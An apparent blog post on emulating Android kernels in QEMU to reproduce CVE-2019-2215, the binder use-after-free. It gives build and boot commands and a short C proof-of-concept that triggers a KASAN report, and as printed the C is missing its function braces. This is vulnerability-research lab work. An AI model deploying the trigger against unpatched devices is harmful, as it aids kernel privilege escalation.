Android kernel emulation with QEMU

We are going to try all the iterations of the android kernel in order to understand the compatibility of emulator.

In that case, we will start working with cloudfuzz‘s android kernel that works on Android10, Pixel2 XL.

repo init --depth=1 -u -b q-goldfish-android-goldfish-4.14-dev

repo sync -c --no-tags --no-clone-bundle -jnproc

On qemu it worked


Pulling the common android kernel

make defconfig

make kvm_guest.config


qemu-system-x86_64 -m 1G -kernel arch/x86/boot/bzImage -hda wheezy.img -append "root=/dev/sda"


It worked for different branch names too 

Without kvm_guest.config it worked.


On Ubuntu 18.04.6 LTS

Enabled CONFIG_BINDER_IPC and KASAN manually.

Patched the vulnerability manually which is mentioned here.

I commented out the green region on the kernel and commented out a few lines for iovec’s usage for exploitation.

The kernel is ASB-2019-11-05_mainline

Booted up with qemu as i mentioned above

PoC compiled with direct gcc on the VM machine because its x86 kernel is running on the qemu.

#include <fcntl.h>
#include <sys/epoll.h>
#include <sys/ioctl.h>
#include <unistd.h>

#define BINDER_THREAD_EXIT 0x40046208ul

int main()
        int fd, epfd;
        struct epoll_event event = { .events = EPOLLIN };
        fd = open("/dev/binder", O_RDONLY);
        epfd = epoll_create(1000);
        epoll_ctl(epfd, EPOLL_CTL_ADD, fd, &event);
        ioctl(fd, BINDER_THREAD_EXIT, NULL);

I pulled the PoC by wget and SimpleHTTPServer to the machine.

We got the KASAN report when I run the PoC

I tried to run CVE-2019-2215 LPE on the qemu and i got it this.

Let’s try to make it works.

Side note:
I couldn’t emulate any android kernel with android configs. I can enable the binder manually, but other environments demand different needs that QEMU cannot supply. For this reason, if you are working on a specific device’s kernel or specific config file you have to have the device or customized QEMU which could be the emulator or the cuttlefish. In that case, we have a few public sources:






Bir cevap yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir